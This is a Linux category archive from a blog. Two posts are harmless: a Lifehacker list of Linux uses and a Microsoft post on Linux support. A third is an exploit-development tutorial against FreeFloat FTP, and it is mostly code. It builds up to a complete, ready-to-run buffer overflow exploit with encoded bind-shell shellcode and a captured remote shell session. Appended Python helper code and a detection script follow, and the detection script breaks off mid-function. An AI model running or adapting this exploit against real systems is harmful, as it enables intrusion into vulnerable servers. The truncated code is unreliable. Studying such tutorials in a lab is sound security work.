Category Archives: Linux

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

Even if you’re a Windows (or Mac) user, knowing how to use Linux is a valuable skill, and it can run a bunch of awesome things in your home—even if it isn’t your main desktop OS. Here are 10 ways you can use Linux even if you’re not ready to go full Ubuntu.

10. Troubleshoot Other Computers


You don’t even need to install Linux on a box to make it useful—all you need is a solid live CD. Just boot from the CD and you can grab any files from the hard drive, even if the computer won’t boot or you’ve forgotten your password. Linux can even help if you accidentally formatted your entire drive. Of course, not all system rescue discs are Linux—and there are a lot of good ones out there—but a bit of basic Linux knowledge can turn you into a troubleshooting expert.

9. Make a Chromebook More Useful


You’d be surprised how much you can get done in Chrome OS. There are a lot of great Chrome apps out there for editing audio, video, images, coding, and more—but sometimes you just need a more powerful desktop app you’re familiar with. Luckily, you can install Linux alongside Chrome OS really easily, and get access to a traditional desktop with a bunch of apps. It won’t get you Photoshop or something of that caliber, but if all you need is a bit of a safety net, it’s perfect.

8. Host a Web Site or Webapp


You’d be surprised how many web sites you visit every day actually run on Linux—and if you want to build a web site, you probably will too. Possibly more interesting, though, is how you can use a Linux-based web host—like Dreamhost—to host your own personal RSS reader with Tiny Tiny RSS, or your own Dropbox clone with OwnCloud. You could, of course, host these on a Linux box in your home, too. It’s a bit more complicated, but it gives you complete control over everything rather than putting your data in someone else’s hands.

7. Work with Hard Drives and Partitions


If you dual- or triple-boot your system and ever want to move partitions around, you’ll have a much easier time with a Linux live CD and GParted. Heck, even if you don’t dual-boot, you’ll still need a bit of help from Linux if you ever migrate to a solid-state drive, or upgrade to a more spacious drive. And, if you want to securely wipe it so no one can get at your data…well, Ubuntu can do that too.

6. Automate Everything In Your Home


With a little Linux knowledge and a cheap computer—like the Raspberry Pi—you can create all sorts of tiny home automation gadgets. You can control your home with Siri, mount a Google Calendar tablet on your wall, set up a home surveillance system, control your blinds and air conditioner, stream music in your living room, build a digital photo frame, build a sunrise alarm clock, and…pretty much anything else you can think of. With a cheap board like the Raspberry Pi and a free OS like Linux, you’re more limited by your imagination than your wallet.

5. Run a Home Server for Backup, Streaming, Torrenting, and More


If you don’t want to leave your computer on 24/7 just to share files or download torrents, a tiny dedicated Linux box might be a better solution. With an old computer or a cheap new one, you can put together a home server that stores your backups, streams movies and music, seeds torrents, or performs any number of other tasks quietly in the corner. You can put one together with Nas4Free, FreeNAS, or even Ubuntu—though our favorite solution is the Linux-based Amahi. (Yes, we know FreeNAS and NAS4Free are technically FreeBSD—but we’re going to lump them in with Linux for practical purposes.)

4. Create a Dedicated Media Center or Video Game Machine


If you have a computer that won’t even use the desktop—like a media center or dedicated emulation machine—why not just set it up with a Linux backend? It’s free and easy to do. XBMC works great on Linux, whether you’re running on a Raspberry Pi or just a low-powered PC, and you can turn just about any PC into an all-in-one retro video game console. The Raspberry Pi works well for older games, but you’d want something more powerful to play newer stuff. Heck, you could even use it to create a retro arcade coffee table.

3. Brush Up on Your Hacking and Security


Some Linux distributions, like BackTrack or Kali, are security-focused distros for testing security systems. That means you can use them to learn how to, say, hack WEP or WPA Wi-Fi passwords, which is a great way to learn a bit more about your own network security and how to protect yourself from similar attacks. Of course, we don’t recommend using these powers for evil—but knowing evil’s tricks gives you a good path to preventing them.

2. Revive an Old or Slow PC


And so we come to one of the most obvious and common uses for Linux—and still one of the best. If you have a PC that’s seen better days, Windows is far from the ideal OS. Install a lightweight Linux distribution on it (like Lubuntu or, if you’re a bit more savvy, Archbang) and it’ll feel like a new machine again. It may not be able to do everything your powerful Windows machine can do, but it’s better than having a non-functional computer, and works perfectly for basic tasks.

1. Learn More About How Computers Work


If none of the above sound like anything you need, why not just get in the spirit of DIY and learn a little bit more about how computers work? Tons of things run Linux these days, from TVs to the Android phone in your pocket, and learning about Linux is not only a fun hobby in and of itself, but it’ll help you learn a bit more about what makes these machines tick. We recommend getting started with something like Ubuntu or Mint, then when you get a little more familiar, move on to Arch for some serious learning. There are a ton of great distros out there, and even if you’re just playing around, you may find that those skills come in pretty handy one day.

Source: lifehacker.com


Microsoft loves Linux

But you may ask “Why is Microsoft working with Linux and open source?”, or “What’s Microsoft’s plan going forward?”, or “What does ‘Microsoft loves Linux’ mean for me as a customer?”

At the core, “Microsoft ♥ Linux” is driven by what we’ve heard from you as customers.  You run workloads on Windows.  You run workloads on Linux.   You run these workloads in your on-premises datacenters, hosted at service providers, and in public clouds.  You just want it all to work, and to work together regardless of the operating system.  We hear you, and understand that your world is heterogeneous.  Bottom line, this is a business opportunity for Microsoft to offer heterogeneous support — both Windows and Linux workloads – on-premises and in a public cloud.  Microsoft can add real value in a heterogeneous cloud.

It may come as a surprise, but Microsoft has been working with Linux for a number of years.  System Center Operations Manager has offered Linux and UNIX monitoring since 2009.   Drivers for running Linux guests on Hyper-V became widely available for a number of distros in 2010, and we even have drivers for running FreeBSD guests on Hyper-V.  Microsoft Azure offered Linux VMs on “day 1” of the Azure IaaS general availability in 2013.

We’ve built a significant customer base that is using Linux with Microsoft products.  Several hundred thousand Linux and UNIX servers in production usage today are managed by System Center, with the largest customers managing nearly 10,000 Linux servers.  Customers such as Ancestry.com, Equifax, the United Kingdom government FCO Services, and Europcar operate Microsoft clouds on-premises running Hyper-V and System Center with many VMs running Linux.  More than 20% of the VMs in Azure IaaS are running Linux.  Azure is offering the HDInsight (Hadoop) service running on Linux in addition to running on Windows.  And if you look more broadly, Microsoft offers key productivity software such as Office365, Skype, and RDP clients on Linux-based and BSD-based client operating systems such as iOS, Android, and Mac OS X.

What does this all add up to?  Working with Linux isn’t new at Microsoft.  In fact, Linux is already a sizable commitment for Microsoft that is now getting a higher public profile.  We see executing on that commitment as a critical part of what we offer customers.

Linux in your datacenter

Microsoft is making huge investments in the foundational cloud technologies that are described in other entries in this blog series:  Compute, Networking, and Storage.  These investments are informed by our experience with the hyper-scale Azure public cloud.  They are also independent of the guest operating system, so they work for both Windows and Linux.  Great features like storage quality-of-service, network virtualization, and super-fast live migration using RDMA work for Linux just like they work for Windows.  In the product development teams, when we envision and design new capabilities for the cloud foundation, we ask “How does this work for Windows?” and we ask “How does this work for Linux?”   As a result, the Microsoft offering for on-premises datacenters is fundamentally heterogeneous, able to run Windows and Linux guests in a unified fashion.

Of course, some capabilities require the cooperation of the guest OS.  For these capabilities, Microsoft developers write the Linux device driver code for Hyper-V and participate in the Linux community to get the code into the upstream Linux kernel at kernel.org.  Then we engage with distro vendors like Red Hat, Canonical, Oracle, and SUSE to enable full support on Hyper-V for these distros that you are probably running.  As a result, Linux runs great on Hyper-V!

We also invest in the management layer.  We are announcing that the first version of PowerShell Desired State Configuration (DSC) for Linux is now available. With DSC for Linux, you can do consistent configuration management across Windows and Linux.  On Linux you can install packages, configure files, create users & groups, and set up services.   DSC for Linux is also an open source project, available on GitHub.

Our enterprise management functionality in System Center Operations Manager, Configuration Manager, Virtual Machine Manager, and Data Protection Manager manages Linux right alongside Windows so that you can have a single systems management infrastructure for your heterogeneous datacenter.   We’ve taken System Center management beyond just the Linux operating system, and into open source middleware such as Tomcat, JBoss, Apache Web Server, and MySQL.  Also, we have extended our hybrid services to include Linux — for example, Azure Site Recovery between on-premises datacenters (or service providers) and Azure.

Linux in Microsoft Azure

As we’re doing for the on-premises datacenter, Microsoft is making huge investments in the Azure public cloud.  Again, our goal is that everything in Azure works for Linux VMs just like it works for Windows VMs.  Capabilities like the huge “G” series VM sizes, Premium Storage, and Azure Backup for VMs are available for both Windows and Linux, as is a range of extensions for custom scripting, regaining access, and OS patching.  Some capabilities, such as integration with Docker, Chef, and other open source projects, are available to you on Linux before they are available on Windows.

Azure offers a range of enterprise-ready Linux distros:  SUSE Linux Enterprise Server, openSUSE, Ubuntu Linux, Oracle Linux, and CoreOS, as well as community distros such as CentOS.  Or you can upload your own custom Linux image.

If you are consuming Azure services, you want flexibility to access those services from a Windows computer, or from a Linux or Mac OS X computer.  For starters, you’ve probably used the Azure portal, which is an HTML5 web application that works in browsers running on Windows as well as browsers on Linux and Mac OS X.  But as your usage progresses, you may want to integrate Azure into your operational processes.  On Windows, Powershell is the primary scripting and automation interface.   For Linux and Mac OS X (and Windows), Azure offers a node.js-based package of commands for scripting and automating the full lifecycle of Azure services.

In Azure datacenters, Microsoft personnel are now operating PaaS services based on Linux as well as services based on Windows.  The HDInsight (Hadoop) service is the first to be available on Linux, and it makes good business sense for other services using “born on Linux” open source projects to just run on Linux rather than being ported to Windows.  Internal tools for monitoring, diagnosing, patching, and meeting compliance requirements have been extended to include these Linux-based services.

Summary

Microsoft is doing a lot of work with Linux – for on-premises datacenters and service providers, as well as in the Azure public cloud.  We know you run workloads on both Windows and Linux.  We’ve made running and managing Linux workloads a fundamental part of our product offering so that the result is well integrated and just works.  Go to www.microsoft.com/open to learn more about the investments we’re making.  Remember, “Microsoft ♥ Linux”!

Source: blogs.technet.com

My First Buffer Overflow Exploit

Saved Return Pointer Overflows

For our first buffer overflow exploit we will be starting with the most straightforward scenario, where we have a clean EIP overwrite and one of our CPU registers points directly to a large portion of our buffer. For this part we will be creating an exploit from scratch for "FreeFloat FTP". You can find a list of several exploits that were created for "FreeFloat FTP" here.

 

Normally we would need to do bad-character analysis, but for this first tutorial we will rely on the bad characters listed in the pre-existing Metasploit modules on exploit-db. The characters listed are "\x00\x0A\x0D". We need to keep these characters in mind for later.

 

Exploit Development: Backtrack 5/Kali Linux
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

 

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that we can build on it to create our exploit. You can see my POC below; I have based it on the exploits for "FreeFloat FTP" that I found on exploit-db. We will be using the pre-existing "anonymous" user account which comes configured with the FTP server (the exploit should work with any valid login credentials).

#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

 

OK, so far so good: when we attach the debugger to the FTP server and send our POC buffer, the program crashes. In the screenshot below you can see that EIP is overwritten and that two registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps, ESP seems more promising since it contains a larger chunk of our buffer (I should mention, however, that creating an exploit starting in EDI is certainly possible).


Overwriting EIP

Next we need to analyze our crash. To do that we replace our A’s with the Metasploit pattern and resend our buffer. Make sure you keep the original buffer length, since a different buffer length may change how the program crashes.

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1
Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A
y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc
2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

 

When the program crashes again we see the same thing as in the screenshot above except that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let “mona” do some of the heavy lifting. If we issue the following command in Immunity debugger we can have “mona” analyze the program crash. You can see the result of that analysis in the screenshot below.
!mona findmsp

 

From the analysis we can see that EIP is overwritten by the 4 bytes which directly follow the initial 247 bytes of our buffer. Like I said before, we can also see that ESP contains a larger chunk of our buffer, so it is a more suitable candidate for our exploit. Using this information we can reorganize the evil buffer in our POC above to look like this:
evil = "A"*247 + "B"*4 + "C"*749
When we resend our modified buffer we can see that it works exactly as we expected: EIP is overwritten by our four B’s.

 

That means that we can replace those B’s with a pointer that redirects execution flow to ESP. The only thing we need to keep in mind is that our pointer can’t contain any bad characters. To find this pointer we can use “mona” with the following command. You can see the results in the screenshot below.
!mona jmp -r esp


It seems that any of these pointers will do. They belong to OS DLLs, so they will be specific to “WinXP PRO SP3”, but that’s not our primary concern. We can just use the first pointer in the list. Keep in mind that we need to reverse the byte order because the CPU is little-endian. Observe the syntax below.
Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)
Buffer: evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749
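To make the two tool outputs above less of a black box, here is an added Python 3 example (my own code, not the author's or Metasploit's) that re-implements what pattern_create.rb and “!mona findmsp” compute: the cyclic pattern, the offset of the dword that landed in EIP, the little-endian packing of a pointer, and a check of those bytes against the bad characters listed earlier. The EIP value 0x69413269 used below is derived from the pattern itself (the pattern bytes at offset 247 are "i2Ai"); the page does not print it, so treat it as an assumed value.

```python
import string
import struct

# Bad characters listed by the exploit-db modules for this target.
BADCHARS = b"\x00\x0a\x0d"


def pattern_create(length):
    """Re-implementation of Metasploit's pattern_create.rb: a cyclic string of
    Upper-lower-digit triplets (Aa0Aa1...Aa9Ab0...). Every 4-byte window is
    unique for the first 20280 bytes, which is what makes the offset lookup work."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(pattern, eip_value):
    """Offset into the pattern of the dword that landed in EIP (what
    `!mona findmsp` reports). The debugger shows EIP as a number, so it is
    packed back to little-endian bytes before searching the pattern."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("0x%08x does not come from this pattern" % eip_value)
    return idx


def pack_pointer(addr):
    """The 4 bytes written into the buffer for a 32-bit x86 address:
    little-endian, i.e. reversed relative to how the address is printed."""
    return struct.pack("<I", addr)


def find_bad_chars(data, bad=BADCHARS):
    """Sorted list of the bad characters present in data (empty if clean)."""
    return sorted(set(b for b in data if b in bad))


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat[:60] + "...")
    # Assumed EIP value: the dword formed by pattern bytes 247..250 ("i2Ai").
    print("EIP 0x69413269 sits at offset", pattern_offset(pat, 0x69413269))
    # push esp # ret in msvcrt.dll, from the mona output on the page.
    ptr = pack_pointer(0x77C35459)
    print("pointer bytes:", ptr, "bad chars present:", find_bad_chars(ptr))
```

The offset returned for the assumed EIP value is 247, matching the layout "A"*247 + "B"*4 + "C"*749 above, and the packed pointer comes out as \x59\x54\xC3\x77 with none of the three bad characters in it.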
I should stress that it is important to document your exploit properly, for your own and others’ edification. Our final-stage POC should look like this.

#!/usr/bin/python
import socket
import sys
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

 

OK, let’s restart the program in the debugger and put a breakpoint on our pointer so the debugger pauses if it reaches it. As we can see in the screenshot below, EIP is overwritten by our pointer and we hit our breakpoint, which should bring us to our buffer located at ESP.


Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode and (2) insert a payload that is to our liking. Let’s start with the POC: we will be inserting our payload in the part of the buffer that is now made up of C’s. Ideally we would like the buffer length to be adjusted dynamically, so we don’t need to recalculate if we insert a payload of a different size (our total buffer length should remain 1000 bytes). We should also insert some NOPs (No Operation Performed = \x90) before our payload as padding. You can see the result below. Any shellcode that we insert in the shellcode variable will get executed by our buffer overflow.

#!/usr/bin/python
import socket
import sys
shellcode = (
    ""  # placeholder: the encoded payload is inserted here in the next step
)
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer +"C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

 

All that remains now is to pop in some shellcode. We will be using msfpayload to generate our shellcode and pipe the raw output to msfencode to filter out badcharacters.

 

root@bt:~# msfpayload -l
[...snip...]
windows/shell/reverse_tcp_dns     Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp            Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw       Disable the Windows ICF, then listen for a connection and spawn a 
                                  command shell
[...snip...]

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
  
root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] = 
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";

After prettifying the code a bit and adding the relevant notes the final exploit is ready.

#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP (MKD BOF)                                                 #
# OS: WinXP PRO SP3                                                                #
# Author: b33f (Ruben Boonen)                                                      #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 2 of my Exploit Development tutorial series... #
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# nc -nv 192.168.111.128 9988                                   #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                        #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
#                                                                                  #
# C:\Documents and Settings\Administrator\Desktop>                                 #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
#----------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D                                                           #
# 0x77c35459 : push esp #  ret  | msvcrt.dll                                       #
# shellcode at ESP => space 749-bytes                                              #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

 

In the screenshot below we can see the before-and-after output of the “netstat -an” command, and below that the BackTrack terminal output when we connect to our bind shell. Game Over!!

 

root@bt:~/Desktop# nc -nv 192.168.111.128 9988
(UNKNOWN) [192.168.111.128] 9988 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

C:\Documents and Settings\Administrator\Desktop>
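Seen from the other side of the wire, this exploit leaves two plain artefacts: an FTP command whose argument is hundreds of bytes of padding plus non-printable pointer and NOP bytes, and a TCP port (9988 here) that starts listening after the crash. The following is an added Python 3 example of my own, not part of the fuzzysecurity post, that checks for both on constructed sample data; the log format, the 200-byte argument threshold and the netstat excerpts are assumptions, not anything the page records.

```python
import re

# Assumed threshold (not from the page): the crash needs 247 bytes before EIP,
# and legitimate directory names are far shorter than that.
MAX_ARG_LEN = 200
NON_PRINTABLE = re.compile(r"[^\x20-\x7e]")  # anything outside printable ASCII

# Constructed sample lines in an assumed "<client> <command> <argument>" format.
# Line 3 mirrors the page's buffer layout: 247 bytes of padding, the pointer
# bytes \x59\x54\xC3\x77, a NOP sled and more padding.
SAMPLE_FTP_LOG = [
    "192.168.111.1 USER anonymous",
    "192.168.111.1 PASS anonymous",
    "192.168.111.1 MKD reports_2015",
    "192.168.111.1 MKD " + "A" * 247 + "\x59\x54\xc3\x77" + "\x90" * 20 + "C" * 300,
    "192.168.111.1 QUIT",
]

# Constructed "netstat -an" excerpts (Windows layout) before and after the payload ran.
NETSTAT_BEFORE = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
"""
NETSTAT_AFTER = NETSTAT_BEFORE + "  TCP    0.0.0.0:9988           0.0.0.0:0              LISTENING\n"


def inspect_ftp_command(line):
    """Return the reasons (possibly none) an FTP command line looks like an overflow attempt."""
    parts = line.split(" ", 2)
    if len(parts) < 3:          # command without an argument: nothing to inspect
        return []
    _client, cmd, arg = parts
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("%s argument is %d bytes (limit %d)" % (cmd, len(arg), MAX_ARG_LEN))
    if NON_PRINTABLE.search(arg):
        reasons.append("%s argument contains non-printable bytes" % cmd)
    return reasons


def scan_ftp_log(lines):
    """Map the index of each suspicious line to its list of reasons."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = inspect_ftp_command(line)
        if reasons:
            hits[i] = reasons
    return hits


def listening_ports(netstat_output):
    """Set of local TCP ports in LISTENING state parsed from netstat -an text."""
    ports = set()
    for line in netstat_output.splitlines():
        fields = line.split()
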